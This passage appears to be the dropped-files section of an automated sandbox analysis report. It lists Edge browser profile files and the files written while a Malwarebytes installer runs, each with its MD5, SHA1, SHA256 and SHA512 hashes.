| SHA1 | 30681d5a9586749b712faf9cb09356a844722f0d |
| SHA256 | adad83a579c933b1d269929c3b043e6b7fc01d29b3f5f3d7f8834be1b137c87d |
| SHA512 | 7e7d0ae6cfbb6f78ea70854b3035d704a83790c086bcb2cb9ac8a8a0515e984901911b52fea283c0753ab489c901a686d258f95fbedc29708a5fa444242b5d74 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3d0e0a640e94c7339f263dc51d1229d7 |
| SHA1 | 1949312a561a8107007fddc6fb4a634a8144aff4 |
| SHA256 | 93a0e58301b3adeafe5f98a3677355452d3199c1b57f93a41052f7871ffa91e0 |
| SHA512 | 1fe1653a5d7bc543bb3dd40ec3aac02991d6e87efa95ba932f845f539b5093c38beacdaf5c1ca4a12469c938cc953e90db3540d2554f597a26529748c5d92401 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fe101d835ed9661c1c8196d9d18058c9 |
| SHA1 | e0a7b52778b72d044b796a9b0a5031721f7bfe01 |
| SHA256 | 2c52136f9c41de09de0085a5063cf6e81232922401218ff53f6a72fe11d89097 |
| SHA512 | 9499f59ce89afcacc1858a5047eb0fb613f0877a8027d97c6fd307bc21b9dcba9d6884c0aa0f189712b1bc65fa5d64c742440e7ca65065ee0af14fe90ad9dea0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7fbe9011a6198ccc4890363a2bae8040 |
| SHA1 | ccc510e8a2fbc40cb1e18ba19ba539fb5c68e690 |
| SHA256 | 7052d85747ea8c6a0a9240e540b76d02f69e57b202722171210c0553a76c1bc3 |
| SHA512 | 796753a964c8f4dfbc4ef22c88a29c2e1c138113215dca0619989a17c157f33d6f3c13bf7a79c373b351364a987b7afba6e2abfd6d6d1d539d44d402eb755f2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f47026a6edf828ac44aa2cd5e82d747c |
| SHA1 | fd8be862c73fb00ee33753c553113ea4d1d01f45 |
| SHA256 | b420a615902a3d3ae2547d4efc668ab3a6b31d531561b17fd4495ae855c3dc1e |
| SHA512 | c464f734cea8d62bf5ab9db9f635ea0fce6d40ac2a8a1afd73dc1df0ad9c39472ba76eac6379e69b94a695f89f312667b60ef7e607ff20974ac202d5c9614c9c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 77e3f0e10f6431434b921feae81ae8d1 |
| SHA1 | 6f1f5a8171292a9f473137779851788a1a7b1b19 |
| SHA256 | 31e9c0d2f9986f98ad2b1e70692b30a12acb0876cdaa66913f7baf25134aa036 |
| SHA512 | 8dffdd8f51fe9c215aea7714121bb0a3789c57b88eadb3860d7d9f5f927d489995c9d9d4e2d75d2d9b52605df10dcc8b9afb34adc3475f9547c8b70ddb0e68c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000044
| MD5 | e66dd2567f726904a546a2ef9738eb06 |
| SHA1 | 4aa632531c1e35964568ebfa776c38f7eeede689 |
| SHA256 | e9485c8e4b4a255e582e3cec7d1fd174c435c61f06ce87d2326780aa0ea24760 |
| SHA512 | ade2f98380d6cc46f51f8c120befb142db22cb78ace34ccb38506796c233ebb45a5be6a2f568a0bfa4acd79daa12f857b7d563668f63bdd259ea723604cc1d8c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5576507eb8534fca503bb2b5160d5740 |
| SHA1 | 74fb6fe491842bbf5eebc981fba224632c4f3c50 |
| SHA256 | f714fedab272ba40d1577d42288991b9e2a12f8614d9f419aa8d92145181dc83 |
| SHA512 | fd06c6137baba7d70a8b14379ac5202eb1074a147c25baa3878f9c7dbace5e86b96a4ee1133d9950610b19f4323eddf4072728f1731a5e1615ac153dbcf1b965 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fa9ad40417f7d22cf646ebbf0e109f27 |
| SHA1 | ff4fe1cb387057fd2028f851fcb138d88c4d0906 |
| SHA256 | b7bfd6b525e9229a285484ec0fb548eebf755bcc6ae8b5b7fe92a2613950a364 |
| SHA512 | 9bfce51d5617d6144e3108bd45d2291be320d9db5f3cd6d781d1d1358a6e07cc4e2f513b3181066bc2b1cdc3bc930240c1307dc6e295794406104cf69f487948 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 659f42ecc68c35d37082f0f64d603583 |
| SHA1 | 5dff67b8144110179ecc36298646b5b539299314 |
| SHA256 | 968319de98151b3cee05c48b1f7446b349bb3a7f9f9b36cfe750b0f541186c27 |
| SHA512 | 2d7b0861a8d3f71071a5b1ea84ff255c6e19b984288e399ab0db2ee19073a883300ba053a3ab4c8f3b474a650268e13514e974bdf80b36f24de50be7452774fd |
C:\Users\Admin\Downloads\MBSetup.exe
| MD5 | b6d8b7e6f74196f62caba2ca77a7ae91 |
| SHA1 | 6ac9c99f084b5772440e2f135b8d5365f7f45314 |
| SHA256 | 74b0bf9c17091ab1c6c61af0aefbc599f1ecc0fff6dee0144a3dfd5cd1f5e18f |
| SHA512 | ad58bc7b626a13606e3f44df7188b2420e0f31ecb55632eac4b6a05dc1574f1ec1b0ef6b52e11832713c6f8f91c807fe3a815699d0748284993ecc54f2823044 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ac1638f6a589fd79ef3a0aa64fb34653 |
| SHA1 | bc32831f691737eb19f7d9a1510c0e60ca23ba7e |
| SHA256 | 78901cd5a67c27875f781c25842e74053bdb7def6d07451dea9574430f1f4f87 |
| SHA512 | e8abb2b62617d33792e2d57a2ea7fae65c08a02a3f6698eae819a5ec828a9f23c5851aee91c5fcc4a600c8aa57c1719d3b9aed1d0a51e3c658f68b04fdcf7ef9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 08433774a4181ac04fb3fc7ee400e1b2 |
| SHA1 | c8bd304723280d5a2a793733ea05fcbadacba71d |
| SHA256 | 948fdb82aab4ea2f465477c9b745fc7d2ce9bc4aa443fcffd170982c08d11608 |
| SHA512 | 87d838ba15feca1b4bfa0bd120c67a4c49c311ce599c58d8df4f093d81c6751e595276182d2cbda893930a7d16ac4e93c3689c797b64c24bfd742836150a9a8f |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\7z.dll
| MD5 | ab8f0c1a37c0df5c8924aab509db42c9 |
| SHA1 | 53dba959124e6d740829bda2360e851bcb85cce8 |
| SHA256 | 6e223b275b84d948cc5ae1f161f0bfff2adb34de04634c84d7dbe9305a4998d5 |
| SHA512 | ff8a26e8fd5a08c74e5ba93a564e0d3cd932754e7f06993a365bfad06670497889e69ec45bfba1378040b72f82d468e79682beba2439937bb29d2a41da940d4a |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\dotnetpkgtmp\shared\Microsoft.NETCore.App\6.0.25\mscordaccore.dll
| MD5 | c174eda52e913580d505fb0541e513b2 |
| SHA1 | 952808236e912716fd73f66c2f9f8cffb171ae9f |
| SHA256 | 14f351c5fba0f9e7199f921a93db8463276fe47a94668c84292eebfd76557d85 |
| SHA512 | a5af4ac7a57fa4f942ecfa4fddeac5e4143c1cbb819ddb23e98cade821f7964b0e9de97aeb48c4a01c42e2a206d1c6ba97f7d1e84d2498a5ca1e8760849f4fb8 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\MBAMService.exe
| MD5 | 1cf215acd0ff47d93dd5c503f7f096b5 |
| SHA1 | cc905a2fa8caed90b1c53e84f2afa608296ae284 |
| SHA256 | a84747e773dbc0a1c740bf6d531a147e37d4619ff260664bfca9947aca68c2b7 |
| SHA512 | b26a267ce87123cbba59720d868f0ada8b2c9af56593473608e07811a0dc97537a961c5154e26a2a001e1b3a49545ddccdc86a5a4ab7867a1881df953762bdb0 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\ctlrpkg\Malwarebytes_Assistant.runtimeconfig.json
| MD5 | d94cf983fba9ab1bb8a6cb3ad4a48f50 |
| SHA1 | 04855d8b7a76b7ec74633043ef9986d4500ca63c |
| SHA256 | 1eca0f0c70070aa83bb609e4b749b26dcb4409784326032726394722224a098a |
| SHA512 | 09a9667d4f4622817116c8bc27d3d481d5d160380a2e19b8944bdd1271a83f718415ce5e6d66e82e36819e575ec1b55f19c45213e0013b877b8d61e6feb9d998 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\dbclspkg\MBAMCoreV5.dll
| MD5 | b2763acfd7ac2ce596a4f3a930dd2a3f |
| SHA1 | ac18df54e4b64268e93b6e0af650d6cd8fe60274 |
| SHA256 | 3b8fdecc7155bbb62b1d76aa30f06bf079924bc794cf700f5d51ade13444d049 |
| SHA512 | 40b9f4bd1dc10034a5b18d3c0d2447a98aa6e4655d5d43b22aae83720e9eda8f818cf7febc0e8d0cd3b3f051805407a6112b66eb4fddd49ae2ca882a1aaa57b3 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.inf
| MD5 | c481ad4dd1d91860335787aa61177932 |
| SHA1 | 81633414c5bf5832a8584fb0740bc09596b9b66d |
| SHA256 | 793626d240fd8eefc81b78a57c8dfe12ea247889b6f07918e9fd32a7411aa1c3 |
| SHA512 | d292e028936412f07264837d4a321ecfa2f5754d4048c8bcf774a0e076e535b361c411301558609d64c71c1ce9b19e6041efa44d201237a7010c553751e1e830 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.cat
| MD5 | 60608328775d6acf03eaab38407e5b7c |
| SHA1 | 9f63644893517286753f63ad6d01bc8bfacf79b1 |
| SHA256 | 3ed5a1668713ef80c2b5599b599f1434ad6648999f335cf69757ea3183c70c59 |
| SHA512 | 9f65212121b8a5d1a0625c3baa14ef04a33b091d26f543324333e38dcdb903e02ccc4d009e22c2e85d2f61d954e0b994c2896e52f685003a6ef34758f8a650c7 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\servicepkg\mbamelam.sys
| MD5 | 9e77c51e14fa9a323ee1635dc74ecc07 |
| SHA1 | a78bde0bd73260ce7af9cdc441af9db54d1637c2 |
| SHA256 | b5619d758ae6a65c1663f065e53e6b68a00511e7d7accb3e07ed94bfd0b1ede0 |
| SHA512 | a12ccf92bead694f5d3cba7ff7e731a2f862198efc338efc7f33a882fe0eb7499fb3fb533538d0a823e80631a7ca162962fbdfd78e401e3255672910b7140186 |
C:\Program Files\Malwarebytes\Anti-Malware\srvversion.dat
| MD5 | c4b35a1ce68bc060eb6b842c7ca3b310 |
| SHA1 | 0a52d15e79ecceec39c227f4f437300bd386fdba |
| SHA256 | 1d30fe6b0bd710b5a669b6b1c8928b2e04386c63f685371f67cc83c38a048655 |
| SHA512 | f29b3372c79e5080306cbeeca4f9c24652b9b8e3b136c85d4609e82f27575007a0c6c9ff871f6f7269ec9eb23bc331c0e8efb69f183ddfec22f1cefe69f6cc52 |
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
| MD5 | 7f75a35582a1a104fb1a1a9745d82b46 |
| SHA1 | 88a3a082b2c3998187cd1c1af2a99282589c7e00 |
| SHA256 | 5001ed0abe6bd6852b555e8d58399d8f5689f7d3d479406aef3a8276844ad26c |
| SHA512 | 42c821707df68a8827e251761a88a11eb5ddda07ae1a074ccbb139f77b2c0e559af18c97522313be4322c7910fa2e8750c3164e9bfbad09a4f8c212147667e46 |
C:\Program Files\Malwarebytes\Anti-Malware\version.dat
| MD5 | f682923ff44f648b30d850b89e054d5b |
| SHA1 | 965d440d13094c48f516ef58ecfbb7c408442bbc |
| SHA256 | b515b8cb1f98a9e8f4a15978bcf50105eda1e935edc517ff3790c8f23714695a |
| SHA512 | 0e28961e07fa0cc9010dc79b28930baa4ecf61e45ededd70969a16ad5d40d1107668960acc221abfec84362ec1ec795a2371cda04221f4fd39f1862c06697139 |
C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat
| MD5 | 4af55ebda90ab46188cec5c1273b42c6 |
| SHA1 | 5b2b75c1d7b7a7f9040057b6084cb18cfc068585 |
| SHA256 | e37c7d95e4d6098828d506864294c20b606d8f58c10c26bb418e2b60ec711951 |
| SHA512 | c21c26b7c946270c5708578ed277e96f553e6ba02530873fab3de198fb58ba469a84583db05b71f5d0103c4f123eee80a7857d753abf1c97d1bc1d7c368ad774 |
C:\Windows\Temp\MBInstallTemp9062d710ea3311ee841d62d9003ae027\ctlrpkg\mbae64.sys
| MD5 | 95515708f41a7e283d6725506f56f6f2 |
| SHA1 | 9afc20a19db3d2a75b6915d8d9af602c5218735e |
| SHA256 | 321058a27d7462e55e39d253ad5d8b19a9acf754666400f82fe0542f33e733c6 |
| SHA512 | d9230901adeecb13b1f92287abe9317cdac458348885b96ef6500960793a7586c76ae374df053be948a35b44abe934aa853975a6ccd3788f93909903cc718c08 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | 02927e798f84d5b717f02918e0e680fa |
| SHA1 | a9c573419e01ed8bf8dddbf5ac0a3c9729df7b9e |
| SHA256 | 9857d60243a1edd38930330edc5bfec4e68d2426f4fd3adbca4c6dc1cb06e802 |
| SHA512 | 0865e2de6de10d23649af4e590c16cb9874faf0297ae13c0444b8bf9a573fd1ebf29eeb2ae038f74a7916e0b415472e1a88047361e5f41115bd1d88bced55916 |
C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
| MD5 | 46f875f1fe3d6063b390e3a170c90e50 |
| SHA1 | 62b901749a6e3964040f9af5ddb9a684936f6c30 |
| SHA256 | 1cf9d3512efffaa2290c105ac8b7534026604067c9b533e7b7df2e017569a4ec |
| SHA512 | fdfb348061158f8133380e9a94215f4bfc0f6ce643a129d623cb8034c49144f1489de56cd076da645478506d9fbddc7590fe3d643622210084b15fdf0d16b557 |
C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf
| MD5 | 5d1917024b228efbeab3c696e663873e |
| SHA1 | cec5e88c2481d323ec366c18024d61a117f01b21 |
| SHA256 | 4a350fc20834a579c5a58352b7a3aa02a454abbbd9eecd3cd6d2a14864a49cd8 |
| SHA512 | 14b345f03284b8c1d97219e3dd1a3910c1e453f93f51753f417e643f50922e55c0e23aab1d437300e6c196c7017d7b7538de4850df74b3599e90f3941b40ab4a |
C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.cat
| MD5 | 8abff1fbf08d70c1681a9b20384dbbf9 |
| SHA1 | c9762e121e4f8a7ad931eee58ee60c8e9fc3ecb6 |
| SHA256 | 9ceb410494b95397ec1f8fa505d071672bf61f81cc596b8eccd167a77893c658 |
| SHA512 | 37998e0aee93ff47fe5b1636fce755966debe417a790e1aebd7674c86c1583feef04648a7bc79e4dedaabb731051f4f803932ac49ea0be05776c0f4d218b076f |
C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.sys
| MD5 | 83d4fba999eb8b34047c38fabef60243 |
| SHA1 | 25731b57e9968282610f337bc6d769aa26af4938 |
| SHA256 | 6903e60784b9fa5d8b417f93f19665c59946a4de099bd1011ab36271b267261c |
| SHA512 | 47faab5fff3e3e2d2aea0a425444aa2e215f1d5bf97edee2a3bb773468e1092919036bcd5002357594b62519bf3a8980749d8d0f6402de0e73c2125d26e78f1e |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json.bak
| MD5 | a836423ef472e75b78962b039bd425e0 |
| SHA1 | 8a5c9ef0d302ddeaa7764a6cd5da75d29ea76191 |
| SHA256 | 949875c814767d03bee996f6ff21e987ce81b150647d248e7002aeba99ff5899 |
| SHA512 | b9335921daf4b38f7b2ce4dc433743cf14427271b151b17b20d675f7dbc5825779fcb36e27625113656ad146cd5ec10f0fbb5342960418390303741814706b9d |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | ff853c787059931dbf363a4d19d106c7 |
| SHA1 | dc32d898a055838c517b29fde87f3e4cc733abec |
| SHA256 | a83ee6a9f4e9a7f2b59bb4849b15cc78d7601ad888780aa6a4f1bdaa3228cc6f |
| SHA512 | cfcc0aa466f3c6de043b3237f4bf22516285d52df708e7fc82fb3ed63ceed69d516271059d4ac58e5d94b2c3a909dd69b19d8f4d4f1c185030758d328d25072c |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 5bbac093df60392223fc5220d59e6d39 |
| SHA1 | 9f5533769fd795cd7d67b001f71ca968c0d7a9e0 |
| SHA256 | b65663d712a55c0d61f983e5098a3d5fb86f96eb761c0f6fe046773166476238 |
| SHA512 | 945a19c2e77a436d407ca1706b422644cfedf017d7a79c053b201d71cc6f8b267cc65553cd957ca6db67222f30de0173d425248d9da12dbf767cc034b62ddf94 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | f734c7bcdfacb932b8c8e44c1739909d |
| SHA1 | e24b11df4a65f9c2004ee9ea303e8aba13a0ed7f |
| SHA256 | 39d215ec0c3c9ee12022487ce6a9da4bb182d7ad8c4136c7e19a6ec29e88c2dc |
| SHA512 | f82cfbbed0dc56a62cbd07d05678ea69f3715646cca0fcf69d1e7c7e0bb04527eb9c4a505987569312afe36efad0c0e059e24eaa1ab3e12440069c98e8eb1f19 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 63c6b14e361e11daf59b47df5e2dc938 |
| SHA1 | 00114f0566aa33238e7e27471a81818954b54613 |
| SHA256 | 5843b07b91fe2973eafb6c1c256a2394d76e03566bd051b660a30c5ca4f316bd |
| SHA512 | 60c82d24a9d52d8c22776dfe8d81e5fd7969960d50bbe629337efd746729e81d11a20d1c62ae013a07ca9817c820788bbd5084d3bd8f34dc7f913be98ad33745 |
C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat
| MD5 | 61b5aab3d5e0ec04ffd36df2dbd46879 |
| SHA1 | 9039281d5d60d1f06bb405284e48afbf29908604 |
| SHA256 | 653db7352b3f2b3dbfaee78158dd7f005385cf2cca3c5c2263dbf4ba014c51aa |
| SHA512 | cbdcda73d7f4ba69e0207c831a16fa157cd0e70456db7fb6f4af2b6d9a71da09306457024a07d38c872630b4c87550a1bfdd0be5c04648a97a29ff6408397b22 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 35ba0c30a4d444692468a4843725c70b |
| SHA1 | d0345e732871e919b0009515ac9436976f449d96 |
| SHA256 | 17ef84b60cd1647fdee0e40142948d2482586a4bb68a56cf169406e38350def0 |
| SHA512 | 2a6e0086666976afd683fd1853ab697691ed47863bd0b89ce3348df23b2a6863556aacc538999d606c276c7b455625de8a4e1375d91ba4deb6b6da6380087263 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 988e376203f238a4f16af933600d2edd |
| SHA1 | e8b9f09460ae087c723af31838c3f1c45bd7c7de |
| SHA256 | 6f8617f5b84db8af48d252c9f278ae2dae9caccf51925f2b623ec61a6d06e6c6 |
| SHA512 | c6a0679023cdead204b2694b9f81751234690b5c9b5ad58ad8ca0b7f63b9bde32346279af62f53ba42b3f40ae4ba9ab30ce57ee948e15de99ae784e4276e56c2 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak
| MD5 | 29dd9d3faadd0e2a344a7a6003eb4393 |
| SHA1 | a6c181be1728e54298f01e28f86dc99c20a4de20 |
| SHA256 | 4e8807904c5df8451903729b309d53e3cb49a30a0b90466df949f82868977d5b |
| SHA512 | b5ea74444a4114ceca7565bc798d35dec81926397dcaed37e19986a5e92899b51303f53e1cb1a5b262da40c3167bb206ea3116d92cde8f24cb8eaa813d839b95 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rules.mbdb
| MD5 | b7ab2383b8e2a95b50dbb99b5261a2b0 |
| SHA1 | c3b0de69d1ca2fa7a741703d59b7da65c5f7f456 |
| SHA256 | d929a67acf7346ed4e1f6f35b9be579a3d14cd3a6ee4a38f4dd8d77ca35f1729 |
| SHA512 | f21ce07420661f750a65790fe16353614d42a203ca2581887cfa1fba55336cfaf662599ec94b1a81d5971900e59216a2c59de7541f1085958e40c0f61320d693 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rdefs.mbdb
| MD5 | 2f7423ca7c6a0f1339980f3c8c7de9f8 |
| SHA1 | 102c77faa28885354cfe6725d987bc23bc7108ba |
| SHA256 | 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55 |
| SHA512 | e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\prot.mbdb
| MD5 | 546d9e30eadad8b22f5b3ffa875144bf |
| SHA1 | 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d |
| SHA256 | 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f |
| SHA512 | 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\scan.mbdb
| MD5 | da36147a72d8a1c37789320a92bf0051 |
| SHA1 | 55fd106c31eb233ed6335ed4fe0c0f9690d58c6c |
| SHA256 | 89d315861ebe01071317212466c63fb74385d740a6034443d1bbdae090b09428 |
| SHA512 | b72b8c50289d91a7ee194474886efd3aa2b1ac665246c30a2a4db83566bb955a210467b3cbb193945ea55a91ab5465a0d098a4bd415da2eb12267a7936081b58 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\tids.mbdb
| MD5 | cd36d4f99b48adf42f78c0f3b98524ea |
| SHA1 | 427509df675f45166210a7f254e05e5abd313eb2 |
| SHA256 | 84c5ac471c5b00a8ee775585ef833bde5e194a2ed5ead4c118b5b209aab2d2ff |
| SHA512 | fa93bc3230106cb4dd3192efce4df69d035a280e01c4f79da776429425c43a2bfdf16eec766d7a740b1e5d6dc3a9e68e4ca71638d29dbfb0b9ddb6f8a286b1a1 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\clean.mbdb
| MD5 | 8f54705e090776ed5132a3c0ff52b844 |
| SHA1 | 1ab5ebd87579801626b57b31a0b5d2afd945468a |
| SHA256 | 50058edfd571d2b2714f9f34a715cae511b2fc0b11fdb54ef7576235e9a3b0e6 |
| SHA512 | e00edc8e0b890b79498863659f0727281a57fbf3223e2ba987939d5d7924644ea483a26b8a245a75f038977da514504afa241c804b66e8b7e30e9e43f8895d34 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb
| MD5 | 1c9f8498e0a0cd20f55af4faeb8fa01a |
| SHA1 | 9398c88fa401388dc8f22def161a648454877fc3 |
| SHA256 | d1b236bb758d5c8e5cee9500258420c42ba2f9935ed0f0d72765857fafbe7970 |
| SHA512 | 535243d9ac4f6cd7043c416a25a0cbf1b1696d0c305622aa1056c6efde8f510e52b8022fc58a9a59c9cd380df2d8a4aa1568bc821d26b133cc267cc53c43783e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.sr
| MD5 | c264c2c9c754507f2d1039a9019a37ad |
| SHA1 | 189008930df72aeb4ed02e164cfc4cfbfad05004 |
| SHA256 | d78b371d4f6c0e5a5791a80159949b572dd85980e9bd2bfc98c7d0854ccf781f |
| SHA512 | d0808847a3e7f0f7115f6225a6e88025bace41082cd742c09a07133ec100d10a5fc4cfcc91a2dbfac4ebfcf82aa65c8f7b6371dbf6e742e76d42daf5b96bb0fb |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll
| MD5 | 20d70c6e04dbf14c01ab2d756e97854f |
| SHA1 | f172c8b8c0e87d2a9ab064513dce004d16d03e0d |
| SHA256 | c4002339b58bc493ae3540bafe1b2ca0a70bba0f853e29f60e0f6a1680fa9a24 |
| SHA512 | 13e073cd4b3d53c6d9fdda671a55962266b5c0a18abcb5774092c35f0d0bf2c5d0d9802d8955d32cceb166821634bfc067dac7809c9ade143cf3a3b497743b36 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dynconfig.dat
| MD5 | 10f23e7c8c791b91c86cd966d67b7bc7 |
| SHA1 | 3f596093b2bc33f7a2554818f8e41adbbd101961 |
| SHA256 | 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc |
| SHA512 | 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\exclusions.txt
| MD5 | aef4eca7ee01bb1a146751c4d0510d2d |
| SHA1 | 5cf2273da41147126e5e1eabd3182f19304eea25 |
| SHA256 | 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f |
| SHA512 | d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\mbdigsig2.dat
| MD5 | 9ca4d1f0c376ef7d268c4f39ebe22a39 |
| SHA1 | 81ac2891e6cb1ac8e120d93e6b1637516d9002c5 |
| SHA256 | 16653be0cf560b622acd48ba07c1984545fc795262d9f71e56af92cbbd61cd69 |
| SHA512 | bf4362472821af45a5476fc3d35fa3941a04d1214deacee50e6b84506e8fcea19e3e3df765bfa10ed2b78dd0a00e89a7655fce386365ca52e8e90959f5c4c329 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dbmanifest2.dat
| MD5 | 89324b2da363536bfb9206ba274f67d5 |
| SHA1 | 80775bee16ae4255b48c3028633fc084b3db8c5b |
| SHA256 | d4b4bd3226f7d549193f1264ad791e18d908ebe1238b5ab2a73f268a3b31f995 |
| SHA512 | 547244d85a13424088f3ecbcc6205435e44122f91747929f24d09233c12382d5f7ea1b3979106ce8912c17d34e52ec72aa86a2a6db7ee8792c24aef02e84a8c6 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\cfg.bin
| MD5 | 9e955265e30b5c0ce0cf667b6faa1b9e |
| SHA1 | 9663452dc45620af1469c5a773346a03ce91ebc5 |
| SHA256 | 82ce153386ccf9c8f52cf5bc1ed1bf175538ff1e367c52458f2245c387573844 |
| SHA512 | 35a75e83ebf7934a65d8241249e0816ee7a07b21bd671ae1327a2fe2aa09dbbb3cb478194a3390976bf3b29d5bb3a7b1a22626549ccfe8836ea78953591c1367 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.nm
| MD5 | f4444abfcce5142cd61d8433a405a23f |
| SHA1 | 195a36ad18faeeb1c5195918f42a430864ce4cbd |
| SHA256 | e8c0f722370e2f838a5333dc7ddfe16113c4312cbabeaa8d240978da599a69dd |
| SHA512 | a39d5ad31c72bd7e41f88df06d4402ad492d90d1ea4e7612f0d25a57b7c75271d40d0ee5c75a37c872899cfb0886b5f7f034ed989dbf59cb142ee2e52853819b |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll
| MD5 | 746df014f6869285e5545505d5fec062 |
| SHA1 | 52d5f0232b78c0d8746a29e75f80a2b436f38b69 |
| SHA256 | 22047c6efd6906c64ebb45bf08632220aa82c03d1fe21b79502b0cb7b67b32c2 |
| SHA512 | 58e7a0051cff72168ec56072339b2a4961a9bc12600a6fe4dd3c01f0aa8b7d22e3d79d72c7ee9a622508e4052eb7c82d047063659c23b34bf93eff7124619848 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe
| MD5 | bbb352dbbf17f6fc29cd86bc1d80a417 |
| SHA1 | 1c83c920ae75d0f6e8634804e508e9156f565148 |
| SHA256 | 73df768292a90e52fcbc5dedc51f8091083fb6042f4413d69afeace1cb0ba509 |
| SHA512 | 12242406306d9808afb3c9d9d590867f4d116a765d0ec761436b4e272ce456b0b72a5687856d1b6672980faf4246721d297b0520821d5fcb81d7eaa86775ee5f |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll
| MD5 | a3fe79081a59d493c01b5c1139babdc9 |
| SHA1 | 1505cb4053bcd9b55c40227ad6b62a2457cebbdf |
| SHA256 | 60c8c024ff020f04fcccec10ee78872bb1e6985463d6370c6af095761d88b860 |
| SHA512 | 22310a585edb36050ff20356cd9eb5129cdae3ffea2ccd7a54d9652dbd336d7f402ed119dc59ae3250b93bad40e75983184256c0bb239cff049bbb983f487bdc |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 3e150e49df1d1287a3aeda09344b8dc7 |
| SHA1 | 73445db8b83127343a03be50cd893fce16fd547b |
| SHA256 | 0c9c1a4c8deb31c09dbfbfdab1769654f0ed3d348b4a76f667ea0bb6805aa5ff |
| SHA512 | 54311ad59ef9695529d8f1345f00eb9d0d73ef0218f0bedaef16fdb4a8e3477b13434571ad3d7539456aea3727e50e601915348c2e7238853d7c134abd369553 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 643d522fdc0b6805b36d65d67520f105 |
| SHA1 | 9246ef5f574fe3c81a0828466833837cde1d01f0 |
